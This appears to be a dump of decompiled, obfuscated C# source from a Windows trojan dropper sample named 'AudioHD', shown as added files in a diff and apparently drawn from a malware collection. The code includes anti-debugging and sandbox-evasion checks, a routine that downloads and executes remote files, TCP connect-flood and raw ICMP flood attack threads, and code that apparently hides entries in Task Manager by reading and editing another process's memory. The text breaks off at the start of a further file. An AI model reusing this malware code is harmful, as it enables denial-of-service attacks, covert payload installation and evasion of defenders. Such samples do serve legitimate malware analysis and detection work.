+          else if (num.ToString() == \u0007.\u0007.\u0001(1627))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1797);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1637))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1802);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1657))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1807);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1667))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1812);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1817))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1822);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1677))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1827);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1687))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1832);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1697))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1837);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1707))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1842);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1717))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1847);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1727))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1852);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1737))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1857);
+          else if (num.ToString() == \u0007.\u0007.\u0001(1747))
+            \u0007.\u0007.\u0001 += \u0007.\u0007.\u0001(1862);
+        }
+      }
+    }
+
+    [SpecialName]
+    public static bool \u000F() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ControlKey) & 32768);
+
+    [SpecialName]
+    public static bool \u0010() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.ShiftKey) & 32768);
+
+    [SpecialName]
+    public static bool \u0011() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Capital) & 32768);
+
+    [SpecialName]
+    public static bool \u0012() => Convert.ToBoolean((int) \u0007.\u0007.\u000F(Keys.Menu) & 32768);
+
+    static \u0007()
+    {
+      \u0003.\u000F();
+      \u0007.\u0007.\u0001 = new \u0008();
+      \u0007.\u0007.\u0002 = \u0007.\u0007.\u0001(864);
+      \u0007.\u0007.\u0001 = false;
+      \u0007.\u0007.\u0002 = false;
+      \u0007.\u0007.\u0003 = false;
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0007/_0008.cs

@@ -0,0 +1,130 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0007;
+using System;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u0007
+{
+  internal sealed class \u0008
+  {
+    private static ThreadStart[] \u0001;
+    private static Thread[] \u0001;
+    public static string \u0001;
+    private static IPEndPoint \u0001;
+    public static ushort \u0001;
+    private static \u0008.\u0001[] \u0001;
+    public static int \u0001;
+    public static int \u0002;
+    public static bool \u0001 = false;
+
+    public static void \u000F()
+    {
+      try
+      {
+        \u0008.\u0001 = new IPEndPoint(Dns.GetHostEntry(\u0008.\u0001).AddressList[0], (int) \u0008.\u0001);
+      }
+      catch
+      {
+        \u0008.\u0001 = new IPEndPoint(IPAddress.Parse(\u0008.\u0001), (int) \u0008.\u0001);
+      }
+      \u0008.\u0001 = new Thread[\u0008.\u0002];
+      \u0008.\u0001 = new ThreadStart[\u0008.\u0002];
+      \u0008.\u0001 = new \u0008.\u0001[\u0008.\u0002];
+      for (int index = 0; index < \u0008.\u0002; ++index)
+      {
+        \u0008.\u0001[index] = new \u0008.\u0001(\u0008.\u0001, \u0008.\u0001);
+        \u0008.\u0001[index] = new ThreadStart(\u0008.\u0001[index].\u000F);
+        \u0008.\u0001[index] = new Thread(\u0008.\u0001[index]);
+        \u0008.\u0001[index].Start();
+      }
+      \u0008.\u0001 = true;
+    }
+
+    public static void \u0010()
+    {
+      for (int index = 0; index < \u0008.\u0002; ++index)
+      {
+        try
+        {
+          \u0008.\u0001[index].Abort();
+          \u0008.\u0001[index].Join();
+        }
+        catch
+        {
+          \u0008.\u0001 = false;
+        }
+      }
+      \u0008.\u0001 = false;
+    }
+
+    private sealed class \u0001
+    {
+      private IPEndPoint \u0001;
+      private Socket[] \u0001;
+      private int \u0001;
+
+      public \u0001([In] IPEndPoint obj0, [In] int obj1)
+      {
+        this.\u0001 = obj0;
+        this.\u0001 = obj1;
+      }
+
+      private void \u000F([In] IAsyncResult obj0)
+      {
+      }
+
+      public void \u000F()
+      {
+label_0:
+        try
+        {
+          while (true)
+          {
+            this.\u0001 = new Socket[this.\u0001];
+            for (int index = 0; index < this.\u0001; ++index)
+            {
+              this.\u0001[index] = new Socket(this.\u0001.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
+              this.\u0001[index].Blocking = false;
+              AsyncCallback callback = new AsyncCallback(this.\u000F);
+              this.\u0001[index].BeginConnect((EndPoint) this.\u0001, callback, (object) this.\u0001[index]);
+            }
+            Thread.Sleep(100);
+            for (int index = 0; index < this.\u0001; ++index)
+            {
+              if (this.\u0001[index].Connected)
+                this.\u0001[index].Disconnect(false);
+              this.\u0001[index].Close();
+              this.\u0001[index] = (Socket) null;
+            }
+            this.\u0001 = (Socket[]) null;
+          }
+        }
+        catch
+        {
+          for (int index = 0; index < this.\u0001; ++index)
+          {
+            try
+            {
+              if (this.\u0001[index].Connected)
+                this.\u0001[index].Disconnect(false);
+              this.\u0001[index].Close();
+              this.\u0001[index] = (Socket) null;
+            }
+            catch
+            {
+            }
+          }
+          goto label_0;
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/Token200007A.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token200007A
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0008
+{
+  internal class Token200007A : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0001.cs

@@ -0,0 +1,250 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using System;
+using System.Collections;
+using System.Diagnostics;
+using System.Threading;
+
+namespace \u0008
+{
+  internal sealed class \u0001
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+
+    public void \u000F()
+    {
+      if (\u000F.\u0001.\u0001.\u0003)
+      {
+        try
+        {
+          if (Debugger.IsAttached)
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0002)
+      {
+        try
+        {
+          foreach (string module in (ReadOnlyCollectionBase) Process.GetCurrentProcess().Modules)
+          {
+            if (module.Contains(\u0008.\u0001.\u0001(1889)))
+            {
+              this.\u0010();
+              return;
+            }
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0004)
+      {
+        try
+        {
+          long ticks = DateTime.Now.Ticks;
+          Thread.Sleep(10);
+          if (DateTime.Now.Ticks - ticks < 10L)
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0006)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1906)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0005)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1919)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u000E)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1932)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u000F)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1945)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0001)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1954)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0007)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1963)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0010)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1972)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0014)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u000F(\u0008.\u0001.\u0001(1985)))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0008)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u0015() == \u0008.\u0001.\u0001(1998))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0013)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u0015() == \u0008.\u0001.\u0001(2031))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (\u000F.\u0001.\u0001.\u0011)
+      {
+        try
+        {
+          if (\u000F.\u0001.\u0001.\u0015() == \u0008.\u0001.\u0001(2052))
+          {
+            this.\u0010();
+            return;
+          }
+        }
+        catch
+        {
+        }
+      }
+      if (!\u000F.\u0001.\u0001.\u0012)
+        return;
+      try
+      {
+        string[] strArray = new string[2]
+        {
+          \u0008.\u0001.\u0001(2089),
+          \u0008.\u0001.\u0001(2126)
+        };
+        foreach (string str in strArray)
+        {
+          if (\u000F.\u0001.\u0001.\u0015() == str)
+          {
+            this.\u0010();
+            break;
+          }
+        }
+      }
+      catch
+      {
+      }
+    }
+
+    private void \u0010() => Environment.Exit(0);
+
+    static \u0001() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0002.cs

@@ -0,0 +1,126 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Net;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u0008
+{
+  internal sealed class \u0002
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    public static bool \u0001;
+    public static bool \u0002;
+    public static bool \u0003;
+    public static string \u0001;
+    public static string \u0002;
+    public static string \u0003;
+    public static string \u0004;
+    public static string \u0005;
+    public static string \u0006;
+
+    [DllImport("user32.dll", EntryPoint = "ShowWindow")]
+    private static extern int \u000F([In] int obj0, [In] int obj1);
+
+    internal static void \u000F([In] string obj0, [In] string obj1)
+    {
+      if (\u0002.\u000F())
+      {
+        \u0002.\u0010(obj0, obj1);
+        \u0002.\u0001 = true;
+        \u0002.\u0010(\u0002.\u0001(2144));
+      }
+      else if (!\u0002.\u0010())
+      {
+        if (!\u0002.\u0011())
+          return;
+        \u0002.\u000F(obj0);
+        \u0002.\u0003 = true;
+        \u0002.\u0010(\u0002.\u0001(2174));
+      }
+      else
+      {
+        \u0002.\u0011(obj0, obj1);
+        \u0002.\u0002 = true;
+        \u0002.\u0010(\u0002.\u0001(2157));
+      }
+    }
+
+    internal static bool \u000F() => System.IO.File.Exists(\u0002.\u0001);
+
+    internal static bool \u0010() => System.IO.File.Exists(\u0002.\u0003);
+
+    internal static bool \u0011() => System.IO.File.Exists(\u0002.\u0002);
+
+    private static void \u0010([In] string obj0, [In] string obj1)
+    {
+      new WebClient().DownloadFile(obj0, obj1);
+      Process.Start(new ProcessStartInfo()
+      {
+        FileName = \u0002.\u0001,
+        Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
+      });
+      Thread.Sleep(1000);
+    }
+
+    private static void \u000F([In] string obj0)
+    {
+      Process.Start(new ProcessStartInfo()
+      {
+        FileName = \u0002.\u0002,
+        Arguments = obj0
+      });
+      Thread.Sleep(1000);
+    }
+
+    private static void \u0011([In] string obj0, [In] string obj1)
+    {
+      new WebClient().DownloadFile(obj0, obj1);
+      Process.Start(new ProcessStartInfo()
+      {
+        FileName = \u0002.\u0001,
+        Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
+      });
+      Thread.Sleep(1000);
+    }
+
+    private static void \u0010([In] string obj0)
+    {
+      foreach (Process process in Process.GetProcesses())
+      {
+        if (process.ProcessName.Contains(obj0))
+        {
+          try
+          {
+            \u0002.\u000F(process.MainWindowHandle.ToInt32(), 0);
+          }
+          catch
+          {
+          }
+        }
+      }
+    }
+
+    static \u0002()
+    {
+      \u0003.\u000F();
+      \u0002.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2209);
+      \u0002.\u0002 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2242);
+      \u0002.\u0003 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2267);
+      \u0002.\u0004 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2304);
+      \u0002.\u0005 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2321);
+      \u0002.\u0006 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2338);
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0003.cs

@@ -0,0 +1,127 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0008;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u0008
+{
+  internal sealed class \u0003
+  {
+    private static ThreadStart[] \u0001;
+    private static Thread[] \u0001;
+    public static string \u0001;
+    public static int \u0001;
+    private static IPEndPoint \u0001;
+    public static int \u0002;
+    private static \u0003.\u0001[] \u0001;
+    public static int \u0003;
+    public static bool \u0001 = false;
+
+    public static void \u000F()
+    {
+      try
+      {
+        \u0003.\u0001 = new IPEndPoint(Dns.GetHostEntry(\u0003.\u0001).AddressList[0], 0);
+      }
+      catch
+      {
+        \u0003.\u0001 = new IPEndPoint(IPAddress.Parse(\u0003.\u0001), 0);
+      }
+      \u0003.\u0001 = new Thread[\u0003.\u0003];
+      \u0003.\u0001 = new ThreadStart[\u0003.\u0003];
+      \u0003.\u0001 = new \u0003.\u0001[\u0003.\u0003];
+      for (int index = 0; index < \u0003.\u0003; ++index)
+      {
+        \u0003.\u0001[index] = new \u0003.\u0001(\u0003.\u0001, \u0003.\u0001, \u0003.\u0002);
+        \u0003.\u0001[index] = new ThreadStart(\u0003.\u0001[index].\u000F);
+        \u0003.\u0001[index] = new Thread(\u0003.\u0001[index]);
+        \u0003.\u0001[index].Start();
+      }
+      \u0003.\u0001 = true;
+    }
+
+    public static void \u0010()
+    {
+      for (int index = 0; index < \u0003.\u0003; ++index)
+      {
+        try
+        {
+          \u0003.\u0001[index].Abort();
+          \u0003.\u0001[index].Join();
+        }
+        catch
+        {
+          \u0003.\u0001 = false;
+        }
+      }
+      \u0003.\u0001 = false;
+    }
+
+    private sealed class \u0001
+    {
+      private int \u0001;
+      private IPEndPoint \u0001;
+      private int \u0002;
+      private Socket[] \u0001;
+
+      public \u0001([In] IPEndPoint obj0, [In] int obj1, [In] int obj2)
+      {
+        this.\u0001 = obj0;
+        this.\u0001 = obj1;
+        this.\u0002 = obj2;
+      }
+
+      public void \u000F()
+      {
+        byte[] buffer = new byte[this.\u0002];
+label_1:
+        try
+        {
+          while (true)
+          {
+            this.\u0001 = new Socket[this.\u0001];
+            for (int index = 0; index < this.\u0001; ++index)
+            {
+              this.\u0001[index] = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Icmp);
+              this.\u0001[index].Blocking = false;
+              this.\u0001[index].SendTo(buffer, (EndPoint) this.\u0001);
+            }
+            Thread.Sleep(100);
+            for (int index = 0; index < this.\u0001; ++index)
+            {
+              if (this.\u0001[index].Connected)
+                this.\u0001[index].Disconnect(false);
+              this.\u0001[index].Close();
+              this.\u0001[index] = (Socket) null;
+            }
+            this.\u0001 = (Socket[]) null;
+          }
+        }
+        catch
+        {
+          for (int index = 0; index < this.\u0001; ++index)
+          {
+            try
+            {
+              if (this.\u0001[index].Connected)
+                this.\u0001[index].Disconnect(false);
+              this.\u0001[index].Close();
+              this.\u0001[index] = (Socket) null;
+            }
+            catch
+            {
+            }
+          }
+          goto label_1;
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0004.cs

@@ -0,0 +1,141 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using \u000E;
+using \u000F;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Reflection;
+using System.Threading;
+
+namespace \u0008
+{
+  internal sealed class \u0004
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+
+    public static void \u000F()
+    {
+      try
+      {
+        \u000F.\u0008.\u0010(\u0004.\u0001(2386));
+      }
+      catch
+      {
+      }
+      try
+      {
+        foreach (string str in \u000F.\u0001.\u0001.\u0003)
+        {
+          \u0004.\u000F(str);
+          Thread.Sleep(2000);
+          \u0004.\u0010(str);
+          Thread.Sleep(2000);
+          \u0004.\u0011(str);
+          Thread.Sleep(2000);
+          \u0004.\u0012(str);
+          Thread.Sleep(2000);
+          \u0004.\u0013(str);
+          Thread.Sleep(2000);
+          \u0004.\u0014(str);
+          Thread.Sleep(2000);
+          \u0004.\u0015(str);
+          Thread.Sleep(2000);
+          \u0004.\u0016(str);
+          Thread.Sleep(2000);
+          \u0004.\u0017(str);
+          Thread.Sleep(2000);
+          \u0004.\u0018(str);
+          Thread.Sleep(2000);
+          \u0004.\u0019(str);
+          Thread.Sleep(2000);
+        }
+      }
+      catch
+      {
+      }
+      try
+      {
+        \u0007.\u000F();
+      }
+      catch
+      {
+      }
+      try
+      {
+        \u0007.\u0011();
+      }
+      catch
+      {
+      }
+      try
+      {
+        \u0005.\u000F();
+      }
+      catch
+      {
+      }
+      try
+      {
+        if (\u000F.\u0001.\u0001.\u0001 != \u0004.\u0001(910))
+        {
+          string str1 = \u000F.\u0001.\u0001.\u0001;
+          string str2 = \u000F.\u0001.\u0001.\u0002;
+          \u0002.\u000F(str1 + \u0004.\u0001(1908) + str2 + \u0004.\u0001(2399), Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + str2 + \u0004.\u0001(2399));
+        }
+      }
+      catch
+      {
+      }
+label_15:
+      try
+      {
+        foreach (Process process in Process.GetProcesses())
+        {
+          try
+          {
+            if (process.ProcessName == \u0004.\u0001(2412))
+              goto label_20;
+          }
+          catch
+          {
+          }
+          Thread.Sleep(800);
+          continue;
+label_20:
+          string[] strArray1 = \u000F.\u0001.\u0001.\u0001;
+          string[] strArray2 = \u000F.\u0001.\u0001.\u0002;
+          try
+          {
+            \u0006.\u000F(strArray1, strArray2);
+          }
+          catch
+          {
+          }
+          try
+          {
+            \u0006.\u000F(strArray1, strArray2, 5000);
+            return;
+          }
+          catch
+          {
+            return;
+          }
+        }
+        goto label_15;
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0004() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0005.cs

@@ -0,0 +1,174 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+namespace \u0008
+{
+  internal static class \u0005
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static bool \u0001;
+    private static DateTime \u0001;
+    private static int \u0001;
+    private static bool \u0002;
+
+    public static void \u000F([In] Process obj0)
+    {
+      if (!\u0005.\u0001)
+        \u0005.\u000F();
+      \u0005.\u0001 obj = new \u0005.\u0001(obj0);
+      \u0005.\u0002 = true;
+    }
+
+    private static void \u000F()
+    {
+      new Thread((ThreadStart) (() =>
+      {
+        while (true)
+        {
+          \u0005.\u0010();
+          Thread.Sleep(10);
+        }
+      })).Start();
+      \u0005.\u0001 = true;
+    }
+
+    private static void \u0010()
+    {
+      try
+      {
+        IntPtr mainWindowHandle = Process.GetProcessesByName(\u0005.\u0001(2426))[0].MainWindowHandle;
+        \u0006.\u0004 structure = new \u0006.\u0004();
+        structure.\u0001 = Marshal.SizeOf((object) structure);
+        \u0006.\u000F(mainWindowHandle, ref structure);
+        bool flag1 = structure.\u0003 == 1 || structure.\u0003 == 3;
+        IntPtr num1 = \u0006.\u000F(\u0006.\u000F(mainWindowHandle, IntPtr.Zero, (string) null, (string) null), 1009);
+        IntPtr num2 = \u0006.\u000F(mainWindowHandle);
+        IntPtr num3 = \u0006.\u0010(num2, 2);
+        IntPtr num4 = \u0006.\u0010(num3, 1);
+        uint num5 = \u0006.\u000F(num3, 0);
+        if (num4 != IntPtr.Zero)
+        {
+          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) \u0006.\u000F(num4, 3), IntPtr.Zero);
+          \u0006.\u0010(num3, (uint) (int) num4, 1U);
+        }
+        \u0006.\u000F(num2, num5, 1U);
+        if (flag1)
+          \u0006.\u000F(num1);
+        if ((DateTime.Now - \u0005.\u0001).TotalMilliseconds > 1000.0)
+        {
+          \u0006.\u000F(mainWindowHandle, 273U, (IntPtr) (long) num5, IntPtr.Zero);
+          \u0005.\u0001 = DateTime.Now;
+        }
+        GC.Collect();
+        int num6 = (int) \u0006.\u000F(num1, 4100U, IntPtr.Zero, \u0005.\u0001(911));
+        if (num6 != \u0005.\u0001 || \u0005.\u0002)
+        {
+          \u0005.\u0002 = false;
+          \u0005.\u0001 = num6;
+          for (int index1 = 0; index1 < num6; ++index1)
+          {
+            string[] strArray = new string[10];
+            for (int index2 = 0; index2 < 10; ++index2)
+            {
+              strArray[index2] = \u0005.\u000F(num1, index1, index2).ToLower();
+              if (index2 > 0 && strArray[index2] == strArray[0])
+                break;
+            }
+            foreach (\u0005.\u0001 obj in \u0005.\u0001.\u0001)
+            {
+              bool flag2 = false;
+              bool flag3 = false;
+              for (int index3 = 0; index3 < 10 && strArray[index3] != null && (!flag2 || !flag3); ++index3)
+              {
+                if (strArray[index3].StartsWith(obj.\u0001))
+                  flag2 = true;
+                else if (strArray[index3] == obj.\u0002)
+                  flag3 = true;
+              }
+              if (flag2 && flag3)
+              {
+                \u0006.\u000F(num1, 4104U, (IntPtr) index1--, IntPtr.Zero);
+                --\u0005.\u0001;
+                break;
+              }
+            }
+          }
+        }
+        if (!flag1)
+          return;
+        \u0006.\u000F(IntPtr.Zero);
+      }
+      catch
+      {
+      }
+    }
+
+    private static string \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2)
+    {
+      \u0006.\u0001 obj = new \u0006.\u0001();
+      IntPtr hglobal = Marshal.AllocHGlobal(1024);
+      uint lpdwProcessId;
+      int num1 = (int) \u0006.\u000F(obj0, out lpdwProcessId);
+      IntPtr num2 = \u0006.\u000F(2035711U, false, (int) lpdwProcessId);
+      IntPtr num3 = \u0006.\u000F(num2, IntPtr.Zero, 1024U, 4096U, 4U);
+      obj.\u0001 = 1U;
+      obj.\u0001 = obj1;
+      obj.\u0002 = obj2;
+      obj.\u0001 = (IntPtr) ((int) num3 + Marshal.SizeOf(typeof (\u0006.\u0001)));
+      obj.\u0003 = 50;
+      \u0006.\u000F(num2, num3, ref obj, Marshal.SizeOf(typeof (\u0006.\u0001)), 0);
+      \u0006.\u000F(obj0, 4101U, IntPtr.Zero, num3);
+      \u0006.\u000F(num2, num3, hglobal, 1024, 0);
+      string stringAnsi = Marshal.PtrToStringAnsi((IntPtr) ((int) hglobal + Marshal.SizeOf(typeof (\u0006.\u0001))));
+      Marshal.FreeHGlobal(hglobal);
+      \u0006.\u000F(num2, num3, 0, 32768U);
+      \u0006.\u0010(num2);
+      return stringAnsi;
+    }
+
+    private static string \u000F([In] Process obj0)
+    {
+      foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0005.\u0001(2439) + (object) obj0.Id).Get())
+      {
+        string[] args = new string[1]{ \u0005.\u0001(911) };
+        if (Convert.ToInt32(managementObject.InvokeMethod(\u0005.\u0001(2504), (object[]) args)) == 0)
+          return args[0];
+      }
+      return \u0005.\u0001(911);
+    }
+
+    static \u0005()
+    {
+      \u0003.\u000F();
+      \u0005.\u0001 = DateTime.Now;
+    }
+
+    private sealed class \u0001
+    {
+      public static List<\u0005.\u0001> \u0001 = new List<\u0005.\u0001>();
+      public string \u0001;
+      public string \u0002;
+
+      public \u0001([In] Process obj0)
+      {
+        this.\u0001 = obj0.ProcessName.ToLower();
+        this.\u0002 = \u0005.\u000F(obj0).ToLower();
+        lock (\u0005.\u0001.\u0001)
+          \u0005.\u0001.\u0001.Add(this);
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0006.cs

@@ -0,0 +1,115 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
